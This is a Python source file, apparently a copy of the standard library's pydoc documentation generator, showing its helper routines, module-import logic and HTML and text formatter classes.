| 0
| 0
| null | 2016-10-09T17:22:23
| 2016-10-09T17:22:22
| null |
UTF-8
|
Python
| false
| false
| 101,217
|
py
|
#!/usr/bin/env python3
"""Generate Python documentation in HTML or text for interactive use.
At the Python interactive prompt, calling help(thing) on a Python object
documents the object, and calling help() starts up an interactive
help session.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on the given port on the
local machine. Port number 0 can be used to get an arbitrary unused port.
Run "pydoc -b" to start an HTTP server on an arbitrary unused port and
open a Web browser to interactively browse documentation. The -p option
can be used with the -b option to explicitly specify the server port.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/X.Y/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__all__ = ['help']
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - synopsis() cannot be prevented from clobbering existing
# loaded modules.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import builtins
import importlib._bootstrap
import importlib.machinery
import importlib.util
import inspect
import io
import os
import pkgutil
import platform
import re
import sys
import time
import tokenize
import warnings
from collections import deque
from reprlib import Repr
from traceback import format_exception_only
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', result.rstrip()) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = doc.strip().split('\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not lines[1].rstrip():
return lines[0], '\n'.join(lines[2:])
return '', '\n'.join(lines)
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = pairs[1].join(text.split(pairs[0]))
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return (inspect.isfunction(obj) or
inspect.ismethod(obj) or
inspect.isbuiltin(obj) or
inspect.ismethoddescriptor(obj))
def _is_bound_method(fn):
"""
Returns True if fn is a bound method, regardless of whether
fn was implemented in Python or in C.
"""
if inspect.ismethod(fn):
return True
if inspect.isbuiltin(fn):
self = getattr(fn, '__self__', None)
return not (inspect.ismodule(self) or (self is None))
return False
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant or internal.
# XXX Remove __initializing__?
if name in {'__author__', '__builtins__', '__cached__', '__credits__',
'__date__', '__doc__', '__file__', '__spec__',
'__loader__', '__module__', '__name__', '__package__',
'__path__', '__qualname__', '__slots__', '__version__'}:
return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return True
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
results = []
for (name, kind, cls, value) in inspect.classify_class_attrs(object):
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
results.append((name, kind, cls, value))
return results
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not line.strip():
line = file.readline()
if not line: break
line = line.strip()
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not line.strip():
line = file.readline()
if not line: break
result = line.split('"""')[0].strip()
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
# Look for binary suffixes first, falling back to source.
if filename.endswith(tuple(importlib.machinery.BYTECODE_SUFFIXES)):
loader_cls = importlib.machinery.SourcelessFileLoader
elif filename.endswith(tuple(importlib.machinery.EXTENSION_SUFFIXES)):
loader_cls = importlib.machinery.ExtensionFileLoader
else:
loader_cls = None
# Now handle the choice.
if loader_cls is None:
# Must be a source file.
try:
file = tokenize.open(filename)
except OSError:
# module can't be opened, so skip it
return None
# text modules can be directly examined
with file:
result = source_synopsis(file)
else:
# Must be a binary module, which has to be imported.
loader = loader_cls('__temp__', filename)
# XXX We probably don't need to pass in the loader here.
spec = importlib.util.spec_from_file_location('__temp__', filename,
loader=loader)
_spec = importlib._bootstrap._SpecMethods(spec)
try:
module = _spec.load()
except:
return None
del sys.modules['__temp__']
result = (module.__doc__ or '').splitlines()[0]
# Cache the result.
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
self.filename = filename
self.exc, self.value, self.tb = exc_info
def __str__(self):
exc = self.exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = importlib.util.MAGIC_NUMBER
with open(path, 'rb') as file:
is_bytecode = magic == file.read(len(magic))
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
if is_bytecode:
loader = importlib._bootstrap.SourcelessFileLoader(name, path)
else:
loader = importlib._bootstrap.SourceFileLoader(name, path)
# XXX We probably don't need to pass in the loader here.
spec = importlib.util.spec_from_file_location(name, path, loader=loader)
_spec = importlib._bootstrap._SpecMethods(spec)
try:
return _spec.load()
except:
raise ErrorDuringImport(path, sys.exc_info())
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Remove the module from sys.modules and re-import to try
# and avoid problems with partially loaded modules.
# Also remove any submodules because they won't appear
# in the newly loaded module's namespace if they're already
# in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and value.name == path:
# No such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in path.split('.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
PYTHONDOCS = os.environ.get("PYTHONDOCS",
"http://docs.python.org/%d.%d/library"
% sys.version_info[:2])
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError(message)
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS", self.PYTHONDOCS)
basedir = os.path.join(sys.base_exec_prefix, "lib",
"python%d.%d" % sys.version_info[:2])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'_thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<span class="repr_string">\1</span>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''\
<!doctype html>
<html><head><title>Python: %s</title>
<meta charset="UTF-8">
</head><body>
%s
</body></html>''' % (title, contents)
def heading(self, title, extras=''):
"""Format a page heading."""
return '''
<table class="heading">
<tr><td>{}</td><td class="align_right normal">{}</td></tr></table>
'''.format(title, extras or ' ')
def html_section(self, title, contents, width=6,
prelude='', marginalia=None, gap=' ',
css_class=''):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<code>' + ' ' * width + '</code>'
result = '''<br>
<table class="{}">
<tr>
<td colspan="3"> <br>
{}</td></tr>
'''.format(css_class, title)
if prelude:
result = result + '''
<tr><td rowspan="2">{}</td>
<td colspan="2">{}</td></tr>
<tr><td>{}</td>'''.format(marginalia, prelude, gap)
else:
result = result + '''
<tr><td>{}</td><td>{}</td>'''.format(marginalia, gap)
contents = '{}</td></tr></table>'.format(contents)
return result + '\n<td class="inner_table">' + contents
def bigsection(self, title, *args, **kwargs):
"""Format a section with a big heading."""
title = '<span class="section_title">{}</span>'.format(title)
return self.html_section(title, *args, **kwargs)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(text.expandtabs())
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td style="width:%d%%;vertical-align:text-top">' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table style="width:100%%"><tr>%s</tr></table>' % result
def grey(self, text): return '<span class="grey">%s</span>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, modpkginfo):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = modpkginfo
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def filelink(self, url, path):
"""Make a link to source file."""
return '<a href="file:%s">%s</a>' % (url, path)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return ''.join(results)
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt>'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + ', '.join(parents) + ')'
result = result + '\n</dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl><dt></dt>\n%s<dd></dd></dl>\n' % result
    def docmodule(self, object, name=None, mod=None, *ignored):
        """Produce HTML documentation for a module object.

        Renders a heading (dotted-name breadcrumb, source-file link,
        version/date info), the module docstring, then sections for
        package contents or imported modules, classes, functions, data,
        author and credits.
        """
        name = object.__name__ # ignore the passed-in name
        try:
            all = object.__all__
        except AttributeError:
            all = None
        # Build a breadcrumb: each parent package becomes a link to its own
        # page; the final name component stays plain text.
        parts = name.split('.')
        links = []
        for i in range(len(parts)-1):
            links.append(
                '<a href="{}.html" class="docmodule_link">{}</a>'.format(
                    '.'.join(parts[:i+1]), parts[i]))
        head = '.'.join(links + parts[-1:])
        try:
            path = inspect.getabsfile(object)
            url = path
            if sys.platform == 'win32':
                import nturl2path
                url = nturl2path.pathname2url(path)
            filelink = self.filelink(url, path)
        except TypeError:
            # getabsfile raises TypeError for built-in modules (no file).
            filelink = '(built-in)'
        info = []
        if hasattr(object, '__version__'):
            version = str(object.__version__)
            # Strip RCS/CVS-style "$Revision: ...$" wrappers.
            if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
                version = version[11:-1].strip()
            info.append('version %s' % self.escape(version))
        if hasattr(object, '__date__'):
            info.append(self.escape(str(object.__date__)))
        if info:
            head = head + ' (%s)' % ', '.join(info)
        docloc = self.getdocloc(object)
        if docloc is not None:
            docloc = '<br><a href="%(docloc)s">Module Reference</a>' % locals()
        else:
            docloc = ''
        extras = '<a href=".">index</a><br>' + filelink + docloc
        result = self.heading(head, extras)
        modules = inspect.getmembers(object, inspect.ismodule)
        # Collect visible classes, remembering an anchor for each so that
        # markup() can cross-link references to them.
        classes, cdict = [], {}
        for key, value in inspect.getmembers(object, inspect.isclass):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None or
                (inspect.getmodule(value) or object) is object):
                if visiblename(key, all, object):
                    classes.append((key, value))
                    cdict[key] = cdict[value] = '#' + key
        # Also register base classes defined in other modules so the class
        # tree can link to their pages.
        for key, value in classes:
            for base in value.__bases__:
                key, modname = base.__name__, base.__module__
                module = sys.modules.get(modname)
                if modname != name and module and hasattr(module, key):
                    if getattr(module, key) is base:
                        if key not in cdict:
                            cdict[key] = cdict[base] = modname + '.html#' + key
        funcs, fdict = [], {}
        for key, value in inspect.getmembers(object, inspect.isroutine):
            # if __all__ exists, believe it. Otherwise use old heuristic.
            if (all is not None or inspect.isbuiltin(value) or
                inspect.getmodule(value) is object):
                if visiblename(key, all, object):
                    funcs.append((key, value))
                    fdict[key] = '#-' + key
                    if inspect.isfunction(value): fdict[value] = fdict[key]
        data = []
        for key, value in inspect.getmembers(object, isdata):
            if visiblename(key, all, object):
                data.append((key, value))
        doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
        doc = doc and '<code>{}</code>'.format(doc)
        result = result + '<p>%s</p>\n' % doc
        # Packages show their submodules; plain modules show what they import.
        if hasattr(object, '__path__'):
            modpkgs = []
            for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
                modpkgs.append((modname, name, ispkg, 0))
            modpkgs.sort()
            contents = self.multicolumn(modpkgs, self.modpkglink)
            result = result + self.bigsection('Package Contents', contents,
                                             css_class="package")
        elif modules:
            contents = self.multicolumn(
                modules, lambda t: self.modulelink(t[1]))
            result = result + self.bigsection('Modules', contents,
                                              css_class="module")
        if classes:
            classlist = [value for (key, value) in classes]
            contents = [
                self.formattree(inspect.getclasstree(classlist, 1), name)]
            for key, value in classes:
                contents.append(self.document(value, key, name, fdict, cdict))
            result = result + self.bigsection('Classes', ' '.join(contents),
                                              css_class="classes")
        if funcs:
            contents = []
            for key, value in funcs:
                contents.append(self.document(value, key, name, fdict, cdict))
            result = result + self.bigsection('Functions', ' '.join(contents),
                                              css_class="functions")
        if data:
            contents = []
            for key, value in data:
                contents.append(self.document(value, key))
            result = result + self.bigsection('Data', '<br>\n'.join(contents),
                                              css_class="data")
        if hasattr(object, '__author__'):
            contents = self.markup(str(object.__author__), self.preformat)
            result = result + self.bigsection('Author', contents, css_class="author")
        if hasattr(object, '__credits__'):
            contents = self.markup(str(object.__credits__), self.preformat)
            result = result + self.bigsection('Credits', contents, css_class="credits")
        return result
    def docclass(self, object, name=None, mod=None, funcs={}, classes={},
                 *ignored):
        """Produce HTML documentation for a class object.

        Walks the MRO, emitting the class's attributes grouped by the
        defining class and segregated by kind (methods, class methods,
        static methods, data descriptors, data).
        """
        realname = object.__name__
        name = name or realname
        bases = object.__bases__
        contents = []
        push = contents.append
        # Cute little class to pump out a horizontal rule between sections.
        class HorizontalRule:
            def __init__(self):
                self.needone = 0
            def maybe(self):
                if self.needone:
                    push('<hr>\n')
                self.needone = 1
        hr = HorizontalRule()
        # List the mro, if non-trivial.
        mro = deque(inspect.getmro(object))
        if len(mro) > 2:
            hr.maybe()
            push('<dl><dt>Method resolution order:</dt>\n')
            for base in mro:
                push('<dd>%s</dd>\n' % self.classlink(base,
                                                      object.__module__))
            push('</dl>\n')
        # The three spill* helpers each consume the attrs matching their
        # predicate, emit HTML for them, and return the leftover attrs.
        def spill(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    try:
                        value = getattr(object, name)
                    except Exception:
                        # Some descriptors may meet a failure in their __get__.
                        # (bug #1785)
                        push(self._docdescriptor(name, value, mod))
                    else:
                        push(self.document(value, name, mod,
                                           funcs, classes, mdict, object))
                    push('\n')
            return attrs
        def spilldescriptors(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    push(self._docdescriptor(name, value, mod))
            return attrs
        def spilldata(msg, attrs, predicate):
            ok, attrs = _split_list(attrs, predicate)
            if ok:
                hr.maybe()
                push(msg)
                for name, kind, homecls, value in ok:
                    base = self.docother(getattr(object, name), name, mod)
                    if callable(value) or inspect.isdatadescriptor(value):
                        doc = getattr(value, "__doc__", None)
                    else:
                        doc = None
                    if doc is None:
                        push('<dl><dt>%s</dt><dd></dd></dl>\n' % base)
                    else:
                        doc = self.markup(getdoc(value), self.preformat,
                                          funcs, classes, mdict)
                        doc = '<dd><code>%s</code></dd>' % doc
                        push('<dl><dt>%s%s</dt></dl>\n' % (base, doc))
                    push('\n')
            return attrs
        attrs = [(name, kind, cls, value)
                 for name, kind, cls, value in classify_class_attrs(object)
                 if visiblename(name, obj=object)]
        # Anchor map used by markup() to cross-link attribute names.
        mdict = {}
        for key, kind, homecls, value in attrs:
            mdict[key] = anchor = '#' + name + '-' + key
            try:
                value = getattr(object, name)
            except Exception:
                # Some descriptors may meet a failure in their __get__.
                # (bug #1785)
                pass
            try:
                # The value may not be hashable (e.g., a data attr with
                # a dict or list value).
                mdict[value] = anchor
            except TypeError:
                pass
        # Emit attrs grouped by the class that defines them, in MRO order.
        while attrs:
            if mro:
                thisclass = mro.popleft()
            else:
                thisclass = attrs[0][2]
            attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
            if thisclass is builtins.object:
                attrs = inherited
                continue
            elif thisclass is object:
                tag = 'defined here'
            else:
                tag = 'inherited from %s' % self.classlink(thisclass,
                                                           object.__module__)
            tag += ':<br>\n'
            # Sort attrs by name.
            attrs.sort(key=lambda t: t[0])
            # Pump out the attrs, segregated by kind.
            attrs = spill('Methods %s' % tag, attrs,
                          lambda t: t[1] == 'method')
            attrs = spill('Class methods %s' % tag, attrs,
                          lambda t: t[1] == 'class method')
            attrs = spill('Static methods %s' % tag, attrs,
                          lambda t: t[1] == 'static method')
            attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
                                     lambda t: t[1] == 'data descriptor')
            attrs = spilldata('Data and other attributes %s' % tag, attrs,
                              lambda t: t[1] == 'data')
            assert attrs == []
            attrs = inherited
        contents = ''.join(contents)
        if name == realname:
            title = '<a id="%s">class <strong>%s</strong></a>' % (
                name, realname)
        else:
            title = '<strong>%s</strong> = <a id="%s">class %s</a>' % (
                name, name, realname)
        if bases:
            parents = []
            for base in bases:
                parents.append(self.classlink(base, object.__module__))
            title = title + '(%s)' % ', '.join(parents)
        doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
        doc = doc and '<code>%s<br> </code>' % doc
        return self.html_section(title, contents, 3, doc, css_class="docclass")
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
    def docroutine(self, object, name=None, mod=None,
                   funcs={}, classes={}, methods={}, cl=None):
        """Produce HTML documentation for a function or method object.

        Emits an anchored <dl> entry with the routine's title, its
        signature (when introspectable), a note for bound methods, and
        the marked-up docstring.
        """
        realname = object.__name__
        name = name or realname
        anchor = (cl and cl.__name__ or '') + '-' + name
        note = ''
        skipdocs = 0
        if _is_bound_method(object):
            imclass = object.__self__.__class__
            if cl:
                if imclass is not cl:
                    note = ' from ' + self.classlink(imclass, mod)
            else:
                if object.__self__ is not None:
                    note = ' method of %s instance' % self.classlink(
                        object.__self__.__class__, mod)
                else:
                    note = ' unbound %s method' % self.classlink(imclass, mod)
        if name == realname:
            title = '<a id="%s"><strong>%s</strong></a>' % (anchor, realname)
        else:
            # The routine is bound under a different name; if the real one is
            # documented in the same class, link to it and skip the docs here.
            if (cl and realname in cl.__dict__ and
                cl.__dict__[realname] is object):
                reallink = '<a href="#%s">%s</a>' % (
                    cl.__name__ + '-' + realname, realname)
                skipdocs = 1
            else:
                reallink = realname
            title = '<a id="%s"><strong>%s</strong></a> = %s' % (
                anchor, name, reallink)
        argspec = None
        if inspect.isroutine(object):
            try:
                signature = inspect.signature(object)
            except (ValueError, TypeError):
                # Builtins and some extension routines are not introspectable.
                signature = None
            if signature:
                argspec = str(signature)
                if realname == '<lambda>':
                    title = '<strong>%s</strong> <em>lambda</em> ' % name
                    # XXX lambda's won't usually have func_annotations['return']
                    # since the syntax doesn't support but it is possible.
                    # So removing parentheses isn't truly safe.
                    argspec = argspec[1:-1] # remove parentheses
        if not argspec:
            argspec = '(...)'
        decl = title + argspec + (note and self.grey(note))
        if skipdocs:
            return '<dl><dt>%s</dt><dd></dd></dl>\n' % decl
        else:
            doc = self.markup(
                getdoc(object), self.preformat, funcs, classes, methods)
            doc = doc and '<dd><code>%s</code></dd>' % doc
            return '<dl><dt>%s</dt><dd></dd>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><code>%s</code></dd>\n' % doc)
push('<dd></dd></dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir_, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir_]):
if any((0xD800 <= ord(ch) <= 0xDFFF) for ch in name):
# ignore a module if its name contains a surrogate character
continue
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir_, contents, css_class="index")
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
    """Class for safely making a text representation of a Python object."""
    def __init__(self):
        Repr.__init__(self)
        # Plain-text output can afford longer reprs than the HTML renderer.
        self.maxlist = self.maxtuple = 20
        self.maxdict = 10
        self.maxstring = self.maxother = 100
    def repr1(self, x, level):
        # Dispatch to a type-specific repr_<typename> method when one exists.
        if hasattr(type(x), '__name__'):
            handler_name = 'repr_' + '_'.join(type(x).__name__.split())
            handler = getattr(self, handler_name, None)
            if handler is not None:
                return handler(x, level)
        return cram(stripid(repr(x)), self.maxother)
    def repr_string(self, x, level):
        truncated = cram(x, self.maxstring)
        quoted = repr(truncated)
        if '\\' in truncated and '\\' not in replace(quoted, r'\\', ''):
            # Backslashes are only literal in the string and are never
            # needed to make any special characters, so show a raw string.
            return 'r' + quoted[0] + truncated + quoted[0]
        return quoted
    repr_str = repr_string
    def repr_instance(self, x, level):
        try:
            return cram(stripid(repr(x)), self.maxstring)
        except:
            # repr() of arbitrary objects may raise anything; degrade
            # gracefully to a generic placeholder.
            return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
    """Formatter class for text documentation.

    Mirrors HTMLDoc's doc* interface but emits plain text, using
    overstrike (char + backspace + char) for bold when paged to a tty.
    """
    # ------------------------------------------- text formatting utilities
    _repr_instance = TextRepr()
    repr = _repr_instance.repr
    def bold(self, text):
        """Format a string in bold by overstriking."""
        return ''.join(ch + '\b' + ch for ch in text)
    def indent(self, text, prefix='    '):
        """Indent text by prepending a given prefix to each line."""
        if not text: return ''
        lines = [prefix + line for line in text.split('\n')]
        if lines: lines[-1] = lines[-1].rstrip()
        return '\n'.join(lines)
    def section(self, title, contents):
        """Format a section with a given heading."""
        clean_contents = self.indent(contents).rstrip()
        return self.bold(title) + '\n' + clean_contents + '\n\n'
